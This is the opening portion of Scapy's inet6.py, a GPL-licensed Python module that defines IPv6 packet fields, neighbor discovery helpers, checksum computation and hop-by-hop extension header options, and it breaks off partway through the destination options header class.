#! /usr/bin/env python
|
#############################################################################
|
## ##
|
## inet6.py --- IPv6 support for Scapy ##
|
## see http://natisbad.org/IPv6/ ##
|
## for more informations ##
|
## ##
|
## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ##
|
## Arnaud Ebalard <arnaud.ebalard@eads.net> ##
|
## ##
|
## This program is free software; you can redistribute it and/or modify it ##
|
## under the terms of the GNU General Public License version 2 as ##
|
## published by the Free Software Foundation. ##
|
## ##
|
## This program is distributed in the hope that it will be useful, but ##
|
## WITHOUT ANY WARRANTY; without even the implied warranty of ##
|
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ##
|
## General Public License for more details. ##
|
## ##
|
#############################################################################
|
|
"""
|
IPv6 (Internet Protocol v6).
|
"""
|
|
|
from __future__ import absolute_import
|
from __future__ import print_function
|
|
from hashlib import md5
|
import random
|
import re
|
import socket
|
import struct
|
from time import gmtime, strftime
|
|
import scapy.modules.six as six
|
from scapy.modules.six.moves import range, zip
|
if not socket.has_ipv6:
|
raise socket.error("can't use AF_INET6, IPv6 is disabled")
|
if not hasattr(socket, "IPPROTO_IPV6"):
|
# Workaround for http://bugs.python.org/issue6926
|
socket.IPPROTO_IPV6 = 41
|
if not hasattr(socket, "IPPROTO_IPIP"):
|
# Workaround for https://bitbucket.org/secdev/scapy/issue/5119
|
socket.IPPROTO_IPIP = 4
|
|
from scapy.arch import get_if_hwaddr
|
from scapy.config import conf
|
from scapy.base_classes import Gen
|
from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \
|
MTU
|
from scapy.compat import chb, orb, raw, plain_str
|
import scapy.consts
|
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
|
DestField, Field, FieldLenField, FlagsField, IntField, LongField, \
|
MACField, PacketLenField, PacketListField, ShortEnumField, ShortField, \
|
StrField, StrFixedLenField, StrLenField, X3BytesField, XBitField, \
|
XIntField, XShortField
|
from scapy.packet import bind_layers, Packet, Raw
|
from scapy.volatile import RandInt, RandIP6, RandShort
|
from scapy.sendrecv import sendp, sniff, sr, srp1
|
from scapy.as_resolvers import AS_resolver_riswhois
|
from scapy.supersocket import SuperSocket, L3RawSocket
|
from scapy.utils6 import in6_6to4ExtractAddr, in6_and, in6_cidr2mask, \
|
in6_getnsma, in6_getnsmac, in6_isaddr6to4, in6_isaddrllallnodes, \
|
in6_isaddrllallservers, in6_isaddrTeredo, in6_isllsnmaddr, in6_ismaddr, \
|
in6_ptop, teredoAddrExtractInfo
|
from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP
|
from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \
|
UDP, UDPerror
|
from scapy.utils import checksum, inet_pton, inet_ntop, strxor
|
from scapy.error import warning
|
if conf.route6 is None:
|
# unused import, only to initialize conf.route6
|
import scapy.route6
|
|
|
#############################################################################
|
# Helpers ##
|
#############################################################################
|
|
def get_cls(name, fallback_cls):
|
return globals().get(name, fallback_cls)
|
|
|
##########################
|
## Neighbor cache stuff ##
|
##########################
|
|
conf.netcache.new_cache("in6_neighbor", 120)
|
|
@conf.commands.register
|
def neighsol(addr, src, iface, timeout=1, chainCC=0):
|
"""Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr
|
|
'src' address is used as source of the message. Message is sent on iface.
|
By default, timeout waiting for an answer is 1 second.
|
|
If no answer is gathered, None is returned. Else, the answer is
|
returned (ethernet frame).
|
"""
|
|
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
|
d = inet_ntop(socket.AF_INET6, nsma)
|
dm = in6_getnsmac(nsma)
|
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
|
p /= ICMPv6ND_NS(tgt=addr)
|
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
|
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
|
chainCC=chainCC)
|
|
return res
|
|
@conf.commands.register
|
def getmacbyip6(ip6, chainCC=0):
|
"""Returns the MAC address corresponding to an IPv6 address
|
|
neighborCache.get() method is used on instantiated neighbor cache.
|
Resolution mechanism is described in associated doc string.
|
|
(chainCC parameter value ends up being passed to sending function
|
used to perform the resolution, if needed)
|
"""
|
|
if isinstance(ip6, Net6):
|
ip6 = str(ip6)
|
|
if in6_ismaddr(ip6): # Multicast
|
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
|
return mac
|
|
iff,a,nh = conf.route6.route(ip6)
|
|
if iff == scapy.consts.LOOPBACK_INTERFACE:
|
return "ff:ff:ff:ff:ff:ff"
|
|
if nh != '::':
|
ip6 = nh # Found next hop
|
|
mac = conf.netcache.in6_neighbor.get(ip6)
|
if mac:
|
return mac
|
|
res = neighsol(ip6, a, iff, chainCC=chainCC)
|
|
if res is not None:
|
if ICMPv6NDOptDstLLAddr in res:
|
mac = res[ICMPv6NDOptDstLLAddr].lladdr
|
else:
|
mac = res.src
|
conf.netcache.in6_neighbor[ip6] = mac
|
return mac
|
|
return None
|
|
|
#############################################################################
|
#############################################################################
|
### IPv6 addresses manipulation routines ###
|
#############################################################################
|
#############################################################################
|
|
class Net6(Gen): # syntax ex. fec0::/126
|
"""Generate a list of IPv6s from a network address or a name"""
|
name = "ipv6"
|
ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
|
|
def __init__(self, net):
|
self.repr = net
|
|
tmp = net.split('/')+["128"]
|
if not self.ip_regex.match(net):
|
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
|
|
netmask = int(tmp[1])
|
self.net = inet_pton(socket.AF_INET6, tmp[0])
|
self.mask = in6_cidr2mask(netmask)
|
self.plen = netmask
|
|
def __iter__(self):
|
|
def parse_digit(value, netmask):
|
netmask = min(8, max(netmask, 0))
|
value = int(value)
|
return (value & (0xff << netmask),
|
(value | (0xff >> (8 - netmask))) + 1)
|
|
self.parsed = [
|
parse_digit(x, y) for x, y in zip(
|
struct.unpack("16B", in6_and(self.net, self.mask)),
|
(x - self.plen for x in range(8, 129, 8)),
|
)
|
]
|
|
def rec(n, l):
|
sep = ':' if n and n % 2 == 0 else ''
|
if n == 16:
|
return l
|
return rec(n + 1, [y + sep + '%.2x' % i
|
# faster than '%s%s%.2x' % (y, sep, i)
|
for i in range(*self.parsed[n])
|
for y in l])
|
|
return iter(rec(0, ['']))
|
|
def __str__(self):
|
try:
|
return next(self.__iter__())
|
except StopIteration:
|
return None
|
|
def __eq__(self, other):
|
return str(other) == str(self)
|
|
def __ne__(self, other):
|
return str(other) != str(self)
|
|
def __repr__(self):
|
return "Net6(%r)" % self.repr
|
|
|
|
|
|
|
#############################################################################
|
#############################################################################
|
### IPv6 Class ###
|
#############################################################################
|
#############################################################################
|
|
class IP6Field(Field):
|
def __init__(self, name, default):
|
Field.__init__(self, name, default, "16s")
|
def h2i(self, pkt, x):
|
if isinstance(x, str):
|
try:
|
x = in6_ptop(x)
|
except socket.error:
|
x = Net6(x)
|
elif isinstance(x, list):
|
x = [Net6(a) for a in x]
|
return x
|
def i2m(self, pkt, x):
|
return inet_pton(socket.AF_INET6, plain_str(x))
|
def m2i(self, pkt, x):
|
return inet_ntop(socket.AF_INET6, x)
|
def any2i(self, pkt, x):
|
return self.h2i(pkt,x)
|
def i2repr(self, pkt, x):
|
if x is None:
|
return self.i2h(pkt,x)
|
elif not isinstance(x, Net6) and not isinstance(x, list):
|
if in6_isaddrTeredo(x): # print Teredo info
|
server, _, maddr, mport = teredoAddrExtractInfo(x)
|
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
|
elif in6_isaddr6to4(x): # print encapsulated address
|
vaddr = in6_6to4ExtractAddr(x)
|
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
|
return self.i2h(pkt, x) # No specific information to return
|
def randval(self):
|
return RandIP6()
|
|
class SourceIP6Field(IP6Field):
|
__slots__ = ["dstname"]
|
def __init__(self, name, dstname):
|
IP6Field.__init__(self, name, None)
|
self.dstname = dstname
|
def i2m(self, pkt, x):
|
if x is None:
|
dst=getattr(pkt,self.dstname)
|
iff,x,nh = conf.route6.route(dst)
|
return IP6Field.i2m(self, pkt, x)
|
def i2h(self, pkt, x):
|
if x is None:
|
if conf.route6 is None:
|
# unused import, only to initialize conf.route6
|
import scapy.route6
|
dst = ("::" if self.dstname is None else getattr(pkt, self.dstname))
|
if isinstance(dst, (Gen, list)):
|
r = {conf.route6.route(daddr) for daddr in dst}
|
if len(r) > 1:
|
warning("More than one possible route for %r" % (dst,))
|
x = min(r)[1]
|
else:
|
x = conf.route6.route(dst)[1]
|
return IP6Field.i2h(self, pkt, x)
|
|
class DestIP6Field(IP6Field, DestField):
|
bindings = {}
|
def __init__(self, name, default):
|
IP6Field.__init__(self, name, None)
|
DestField.__init__(self, name, default)
|
def i2m(self, pkt, x):
|
if x is None:
|
x = self.dst_from_pkt(pkt)
|
return IP6Field.i2m(self, pkt, x)
|
def i2h(self, pkt, x):
|
if x is None:
|
x = self.dst_from_pkt(pkt)
|
return IP6Field.i2h(self, pkt, x)
|
|
ipv6nh = { 0:"Hop-by-Hop Option Header",
|
4:"IP",
|
6:"TCP",
|
17:"UDP",
|
41:"IPv6",
|
43:"Routing Header",
|
44:"Fragment Header",
|
47:"GRE",
|
50:"ESP Header",
|
51:"AH Header",
|
58:"ICMPv6",
|
59:"No Next Header",
|
60:"Destination Option Header",
|
112:"VRRP",
|
132:"SCTP",
|
135:"Mobility Header"}
|
|
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
|
4: "IP",
|
6: "TCP",
|
17: "UDP",
|
43: "IPv6ExtHdrRouting",
|
44: "IPv6ExtHdrFragment",
|
#50: "IPv6ExtHrESP",
|
#51: "IPv6ExtHdrAH",
|
58: "ICMPv6Unknown",
|
59: "Raw",
|
60: "IPv6ExtHdrDestOpt" }
|
|
class IP6ListField(StrField):
|
__slots__ = ["count_from", "length_from"]
|
islist = 1
|
def __init__(self, name, default, count_from=None, length_from=None):
|
if default is None:
|
default = []
|
StrField.__init__(self, name, default)
|
self.count_from = count_from
|
self.length_from = length_from
|
|
def i2len(self, pkt, i):
|
return 16*len(i)
|
|
def i2count(self, pkt, i):
|
if isinstance(i, list):
|
return len(i)
|
return 0
|
|
def getfield(self, pkt, s):
|
c = l = None
|
if self.length_from is not None:
|
l = self.length_from(pkt)
|
elif self.count_from is not None:
|
c = self.count_from(pkt)
|
|
lst = []
|
ret = b""
|
remain = s
|
if l is not None:
|
remain,ret = s[:l],s[l:]
|
while remain:
|
if c is not None:
|
if c <= 0:
|
break
|
c -= 1
|
addr = inet_ntop(socket.AF_INET6, remain[:16])
|
lst.append(addr)
|
remain = remain[16:]
|
return remain+ret,lst
|
|
def i2m(self, pkt, x):
|
s = b""
|
for y in x:
|
try:
|
y = inet_pton(socket.AF_INET6, y)
|
except:
|
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
|
y = inet_pton(socket.AF_INET6, y)
|
s += y
|
return s
|
|
def i2repr(self,pkt,x):
|
s = []
|
if x == None:
|
return "[]"
|
for y in x:
|
s.append('%s' % y)
|
return "[ %s ]" % (", ".join(s))
|
|
class _IPv6GuessPayload:
|
name = "Dummy class that implements guess_payload_class() for IPv6"
|
def default_payload_class(self,p):
|
if self.nh == 58: # ICMPv6
|
t = orb(p[0])
|
if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
|
return _niquery_guesser(p)
|
if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages
|
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
|
return Raw
|
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
|
return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
|
elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
|
return IPv6ExtHdrSegmentRouting
|
return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw")
|
|
class IPv6(_IPv6GuessPayload, Packet, IPTools):
|
name = "IPv6"
|
fields_desc = [ BitField("version" , 6 , 4),
|
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
|
BitField("fl", 0, 20),
|
ShortField("plen", None),
|
ByteEnumField("nh", 59, ipv6nh),
|
ByteField("hlim", 64),
|
SourceIP6Field("src", "dst"), # dst is for src @ selection
|
DestIP6Field("dst", "::1") ]
|
|
def route(self):
|
dst = self.dst
|
if isinstance(dst,Gen):
|
dst = next(iter(dst))
|
return conf.route6.route(dst)
|
|
def mysummary(self):
|
return "%s > %s (%i)" % (self.src, self.dst, self.nh)
|
|
def post_build(self, p, pay):
|
p += pay
|
if self.plen is None:
|
l = len(p) - 40
|
p = p[:4]+struct.pack("!H", l)+p[6:]
|
return p
|
|
def extract_padding(self, s):
|
l = self.plen
|
return s[:l], s[l:]
|
|
def hashret(self):
|
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
|
if self.payload.type < 128:
|
return self.payload.payload.hashret()
|
elif (self.payload.type in [133,134,135,136,144,145]):
|
return struct.pack("B", self.nh)+self.payload.hashret()
|
|
if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
|
return self.payload.hashret()
|
|
nh = self.nh
|
sd = self.dst
|
ss = self.src
|
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
|
# With routing header, the destination is the last
|
# address of the IPv6 list if segleft > 0
|
nh = self.payload.nh
|
try:
|
sd = self.addresses[-1]
|
except IndexError:
|
sd = '::1'
|
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
|
# could be anything from the original list ...
|
if 1:
|
sd = inet_pton(socket.AF_INET6, sd)
|
for a in self.addresses:
|
a = inet_pton(socket.AF_INET6, a)
|
sd = strxor(sd, a)
|
sd = inet_ntop(socket.AF_INET6, sd)
|
|
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting):
|
# With segment routing header (rh == 4), the destination is
|
# the first address of the IPv6 addresses list
|
try:
|
sd = self.addresses[0]
|
except IndexError:
|
sd = self.dst
|
|
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
|
nh = self.payload.nh
|
|
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
|
nh = self.payload.nh
|
|
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
|
foundhao = None
|
for o in self.payload.options:
|
if isinstance(o, HAO):
|
foundhao = o
|
if foundhao:
|
nh = self.payload.nh # XXX what if another extension follows ?
|
ss = foundhao.hoa
|
|
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
|
sd = inet_pton(socket.AF_INET6, sd)
|
ss = inet_pton(socket.AF_INET6, self.src)
|
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
|
else:
|
return struct.pack("B", nh)+self.payload.hashret()
|
|
def answers(self, other):
|
if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
|
if self.nh in [4, 41]:
|
return self.payload.answers(other)
|
if isinstance(other, IPv6) and other.nh in [4, 41]:
|
return self.answers(other.payload)
|
if isinstance(other, IP) and other.proto in [4, 41]:
|
return self.answers(other.payload)
|
if not isinstance(other, IPv6): # self is reply, other is request
|
return False
|
if conf.checkIPaddr:
|
# ss = inet_pton(socket.AF_INET6, self.src)
|
sd = inet_pton(socket.AF_INET6, self.dst)
|
os = inet_pton(socket.AF_INET6, other.src)
|
od = inet_pton(socket.AF_INET6, other.dst)
|
# request was sent to a multicast address (other.dst)
|
# Check reply destination addr matches request source addr (i.e
|
# sd == os) except when reply is multicasted too
|
# XXX test mcast scope matching ?
|
if in6_ismaddr(other.dst):
|
if in6_ismaddr(self.dst):
|
if ((od == sd) or
|
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
|
return self.payload.answers(other.payload)
|
return False
|
if (os == sd):
|
return self.payload.answers(other.payload)
|
return False
|
elif (sd != os): # or ss != od): <- removed for ICMP errors
|
return False
|
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
|
# ICMPv6 Error message -> generated by IPv6 packet
|
# Note : at the moment, we jump the ICMPv6 specific class
|
# to call answers() method of erroneous packet (over
|
# initial packet). There can be cases where an ICMPv6 error
|
# class could implement a specific answers method that perform
|
# a specific task. Currently, don't see any use ...
|
return self.payload.payload.answers(other)
|
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
|
return self.payload.answers(other.payload.payload)
|
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
|
return self.payload.answers(other.payload.payload)
|
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
|
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
|
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting):
|
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
|
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
|
return self.payload.payload.answers(other.payload.payload)
|
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
|
return self.payload.payload.answers(other.payload)
|
else:
|
if (self.nh != other.nh):
|
return False
|
return self.payload.answers(other.payload)
|
|
|
class _IPv46(IP):
|
"""
|
This class implements a dispatcher that is used to detect the IP version
|
while parsing Raw IP pcap files.
|
"""
|
@classmethod
|
def dispatch_hook(cls, _pkt=None, *_, **kargs):
|
if _pkt:
|
if orb(_pkt[0]) >> 4 == 6:
|
return IPv6
|
elif kargs.get("version") == 6:
|
return IPv6
|
return IP
|
|
|
def inet6_register_l3(l2, l3):
|
return getmacbyip6(l3.dst)
|
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
|
|
|
class IPerror6(IPv6):
|
name = "IPv6 in ICMPv6"
|
def answers(self, other):
|
if not isinstance(other, IPv6):
|
return False
|
sd = inet_pton(socket.AF_INET6, self.dst)
|
ss = inet_pton(socket.AF_INET6, self.src)
|
od = inet_pton(socket.AF_INET6, other.dst)
|
os = inet_pton(socket.AF_INET6, other.src)
|
|
# Make sure that the ICMPv6 error is related to the packet scapy sent
|
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
|
|
# find upper layer for self (possible citation)
|
selfup = self.payload
|
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
|
selfup = selfup.payload
|
|
# find upper layer for other (initial packet). Also look for RH
|
otherup = other.payload
|
request_has_rh = False
|
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
|
if isinstance(otherup, IPv6ExtHdrRouting):
|
request_has_rh = True
|
otherup = otherup.payload
|
|
if ((ss == os and sd == od) or # <- Basic case
|
(ss == os and request_has_rh)): # <- Request has a RH :
|
# don't check dst address
|
|
# Let's deal with possible MSS Clamping
|
if (isinstance(selfup, TCP) and
|
isinstance(otherup, TCP) and
|
selfup.options != otherup.options): # seems clamped
|
|
# Save fields modified by MSS clamping
|
old_otherup_opts = otherup.options
|
old_otherup_cksum = otherup.chksum
|
old_otherup_dataofs = otherup.dataofs
|
old_selfup_opts = selfup.options
|
old_selfup_cksum = selfup.chksum
|
old_selfup_dataofs = selfup.dataofs
|
|
# Nullify them
|
otherup.options = []
|
otherup.chksum = 0
|
otherup.dataofs = 0
|
selfup.options = []
|
selfup.chksum = 0
|
selfup.dataofs = 0
|
|
# Test it and save result
|
s1 = raw(selfup)
|
s2 = raw(otherup)
|
l = min(len(s1), len(s2))
|
res = s1[:l] == s2[:l]
|
|
# recall saved values
|
otherup.options = old_otherup_opts
|
otherup.chksum = old_otherup_cksum
|
otherup.dataofs = old_otherup_dataofs
|
selfup.options = old_selfup_opts
|
selfup.chksum = old_selfup_cksum
|
selfup.dataofs = old_selfup_dataofs
|
|
return res
|
|
s1 = raw(selfup)
|
s2 = raw(otherup)
|
l = min(len(s1), len(s2))
|
return s1[:l] == s2[:l]
|
|
return False
|
|
def mysummary(self):
|
return Packet.mysummary(self)
|
|
|
#############################################################################
|
#############################################################################
|
### Upper Layer Checksum computation ###
|
#############################################################################
|
#############################################################################
|
|
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
|
name = "Pseudo IPv6 Header"
|
fields_desc = [ IP6Field("src", "::"),
|
IP6Field("dst", "::"),
|
ShortField("uplen", None),
|
BitField("zero", 0, 24),
|
ByteField("nh", 0) ]
|
|
def in6_chksum(nh, u, p):
|
"""
|
As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
|
|
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
|
- 'nh' : value of upper layer protocol
|
- 'u' : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
|
provided with all under layers (IPv6 and all extension headers,
|
for example)
|
- 'p' : the payload of the upper layer provided as a string
|
|
Functions operate by filling a pseudo header class instance (PseudoIPv6)
|
with
|
- Next Header value
|
- the address of _final_ destination (if some Routing Header with non
|
segleft field is present in underlayer classes, last address is used.)
|
- the address of _real_ source (basically the source address of an
|
IPv6 class instance available in the underlayer or the source address
|
in HAO option if some Destination Option header found in underlayer
|
includes this option).
|
- the length is the length of provided payload string ('p')
|
"""
|
|
ph6 = PseudoIPv6()
|
ph6.nh = nh
|
rthdr = 0
|
hahdr = 0
|
final_dest_addr_found = 0
|
while u != None and not isinstance(u, IPv6):
|
if (isinstance(u, IPv6ExtHdrRouting) and
|
u.segleft != 0 and len(u.addresses) != 0 and
|
final_dest_addr_found == 0):
|
rthdr = u.addresses[-1]
|
final_dest_addr_found = 1
|
elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
|
u.segleft != 0 and len(u.addresses) != 0 and
|
final_dest_addr_found == 0):
|
rthdr = u.addresses[0]
|
final_dest_addr_found = 1
|
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
|
isinstance(u.options[0], HAO)):
|
hahdr = u.options[0].hoa
|
u = u.underlayer
|
if u is None:
|
warning("No IPv6 underlayer to compute checksum. Leaving null.")
|
return 0
|
if hahdr:
|
ph6.src = hahdr
|
else:
|
ph6.src = u.src
|
if rthdr:
|
ph6.dst = rthdr
|
else:
|
ph6.dst = u.dst
|
ph6.uplen = len(p)
|
ph6s = raw(ph6)
|
return checksum(ph6s+p)
|
|
|
#############################################################################
|
#############################################################################
|
### Extension Headers ###
|
#############################################################################
|
#############################################################################
|
|
|
# Inherited by all extension header classes
|
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
|
name = 'Abstract IPV6 Option Header'
|
aliastypes = [IPv6, IPerror6] # TODO ...
|
|
|
#################### IPv6 options for Extension Headers #####################
|
|
_hbhopts = { 0x00: "Pad1",
|
0x01: "PadN",
|
0x04: "Tunnel Encapsulation Limit",
|
0x05: "Router Alert",
|
0x06: "Quick-Start",
|
0xc2: "Jumbo Payload",
|
0xc9: "Home Address Option" }
|
|
class _OTypeField(ByteEnumField):
|
"""
|
Modified BytEnumField that displays information regarding the IPv6 option
|
based on its option type value (What should be done by nodes that process
|
the option if they do not understand it ...)
|
|
It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
|
"""
|
pol = {0x00: "00: skip",
|
0x40: "01: discard",
|
0x80: "10: discard+ICMP",
|
0xC0: "11: discard+ICMP not mcast"}
|
|
enroutechange = {0x00: "0: Don't change en-route",
|
0x20: "1: May change en-route" }
|
|
def i2repr(self, pkt, x):
|
s = self.i2s.get(x, repr(x))
|
polstr = self.pol[(x & 0xC0)]
|
enroutechangestr = self.enroutechange[(x & 0x20)]
|
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
|
|
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
|
name = "Scapy6 Unknown Option"
|
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
|
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
|
StrLenField("optdata", "",
|
length_from = lambda pkt: pkt.optlen) ]
|
def alignment_delta(self, curpos): # By default, no alignment requirement
|
"""
|
As specified in section 4.2 of RFC 2460, every options has
|
an alignment requirement ususally expressed xn+y, meaning
|
the Option Type must appear at an integer multiple of x octest
|
from the start of the header, plus y octet.
|
|
That function is provided the current position from the
|
start of the header and returns required padding length.
|
"""
|
return 0
|
|
class Pad1(Packet): # IPv6 Hop-By-Hop Option
|
name = "Pad1"
|
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
|
def alignment_delta(self, curpos): # No alignment requirement
|
return 0
|
|
class PadN(Packet): # IPv6 Hop-By-Hop Option
|
name = "PadN"
|
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
|
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
|
StrLenField("optdata", "",
|
length_from = lambda pkt: pkt.optlen)]
|
def alignment_delta(self, curpos): # No alignment requirement
|
return 0
|
|
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
|
name = "Router Alert"
|
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
|
ByteField("optlen", 2),
|
ShortEnumField("value", None,
|
{ 0: "Datagram contains a MLD message",
|
1: "Datagram contains RSVP message",
|
2: "Datagram contains an Active Network message",
|
68: "NSIS NATFW NSLP",
|
69: "MPLS OAM",
|
65535: "Reserved" })]
|
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
|
# TODO : Now that we have that option, we should do something in MLD class that need it
|
# TODO : IANA has defined ranges of values which can't be easily represented here.
|
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
|
def alignment_delta(self, curpos): # alignment requirement : 2n+0
|
x = 2 ; y = 0
|
delta = x*((curpos - y + x - 1)//x) + y - curpos
|
return delta
|
|
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
|
name = "Jumbo Payload"
|
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
|
ByteField("optlen", 4),
|
IntField("jumboplen", None) ]
|
def alignment_delta(self, curpos): # alignment requirement : 4n+2
|
x = 4 ; y = 2
|
delta = x*((curpos - y + x - 1)//x) + y - curpos
|
return delta
|
|
class HAO(Packet): # IPv6 Destination Options Header Option
|
name = "Home Address Option"
|
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
|
ByteField("optlen", 16),
|
IP6Field("hoa", "::") ]
|
def alignment_delta(self, curpos): # alignment requirement : 8n+6
|
x = 8 ; y = 6
|
delta = x*((curpos - y + x - 1)//x) + y - curpos
|
return delta
|
|
_hbhoptcls = { 0x00: Pad1,
|
0x01: PadN,
|
0x05: RouterAlert,
|
0xC2: Jumbo,
|
0xC9: HAO }
|
|
|
######################## Hop-by-Hop Extension Header ########################
|
|
class _HopByHopOptionsField(PacketListField):
|
__slots__ = ["curpos"]
|
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
|
self.curpos = curpos
|
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
|
|
def i2len(self, pkt, i):
|
l = len(self.i2m(pkt, i))
|
return l
|
|
def i2count(self, pkt, i):
|
if isinstance(i, list):
|
return len(i)
|
return 0
|
|
def getfield(self, pkt, s):
|
c = l = None
|
if self.length_from is not None:
|
l = self.length_from(pkt)
|
elif self.count_from is not None:
|
c = self.count_from(pkt)
|
|
opt = []
|
ret = b""
|
x = s
|
if l is not None:
|
x,ret = s[:l],s[l:]
|
while x:
|
if c is not None:
|
if c <= 0:
|
break
|
c -= 1
|
o = orb(x[0]) # Option type
|
cls = self.cls
|
if o in _hbhoptcls:
|
cls = _hbhoptcls[o]
|
try:
|
op = cls(x)
|
except:
|
op = self.cls(x)
|
opt.append(op)
|
if isinstance(op.payload, conf.raw_layer):
|
x = op.payload.load
|
del(op.payload)
|
else:
|
x = b""
|
return x+ret,opt
|
|
def i2m(self, pkt, x):
|
autopad = None
|
try:
|
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
|
except:
|
autopad = 1
|
|
if not autopad:
|
return b"".join(map(str, x))
|
|
curpos = self.curpos
|
s = b""
|
for p in x:
|
d = p.alignment_delta(curpos)
|
curpos += d
|
if d == 1:
|
s += raw(Pad1())
|
elif d != 0:
|
s += raw(PadN(optdata=b'\x00'*(d-2)))
|
pstr = raw(p)
|
curpos += len(pstr)
|
s += pstr
|
|
# Let's make the class including our option field
|
# a multiple of 8 octets long
|
d = curpos % 8
|
if d == 0:
|
return s
|
d = 8 - d
|
if d == 1:
|
s += raw(Pad1())
|
elif d != 0:
|
s += raw(PadN(optdata=b'\x00'*(d-2)))
|
|
return s
|
|
def addfield(self, pkt, s, val):
|
return s+self.i2m(pkt, val)
|
|
class _PhantomAutoPadField(ByteField):
|
def addfield(self, pkt, s, val):
|
return s
|
|
def getfield(self, pkt, s):
|
return s, 1
|
|
def i2repr(self, pkt, x):
|
if x:
|
return "On"
|
return "Off"
|
|
|
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
|
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
FieldLenField("len", None, length_of="options", fmt="B",
|
adjust = lambda pkt,x: (x+2+7)//8 - 1),
|
_PhantomAutoPadField("autopad", 1), # autopad activated by default
|
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
|
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
|
overload_fields = {IPv6: { "nh": 0 }}
|
|
|
######################## Destination Option Header ##########################
|
|
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
|
name = "IPv6 Extension Header - Destination Options Header"
|
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
FieldLenField("len", None, length_of="options", fmt="B",
|
